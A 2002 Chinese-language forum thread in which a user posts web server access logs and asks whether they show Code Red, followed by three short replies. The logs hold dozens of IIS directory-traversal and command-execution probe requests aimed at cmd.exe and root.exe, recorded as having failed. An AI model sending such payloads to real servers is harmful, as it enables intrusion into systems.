×

Loading...
Ad by
  • 推荐 OXIO 加拿大高速网络,最低月费仅$40. 使用推荐码 RCR37MB 可获得一个月的免费服务
Ad by
  • 推荐 OXIO 加拿大高速网络,最低月费仅$40. 使用推荐码 RCR37MB 可获得一个月的免费服务

这个是不是CODE RED的特征?

本文发表在 rolia.net 枫下论坛xx.xxx.xx.xxx- - [13/Mar/2002:05:31:23 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:57 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
xx.xxx.xx.xxx - - [13/Mar/2002:05:40:57 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303更多精彩文章及讨论,请光临枫下论坛 rolia.net
Report

Replies, comments and Discussions:

  • 工作学习 / IT技术讨论 / 这个是不是CODE RED的特征?
    本文发表在 rolia.net 枫下论坛xx.xxx.xx.xxx- - [13/Mar/2002:05:31:23 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:24 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    xx.xxx.xx.xxx - - [13/Mar/2002:05:31:25 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:56 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:57 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    xx.xxx.xx.xxx - - [13/Mar/2002:05:40:57 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303更多精彩文章及讨论,请光临枫下论坛 rolia.net
    • 然.
      • linux的好处体现出来了:)。风GG,到你的自留地去看看。
        • delete "scripts" folder is ok.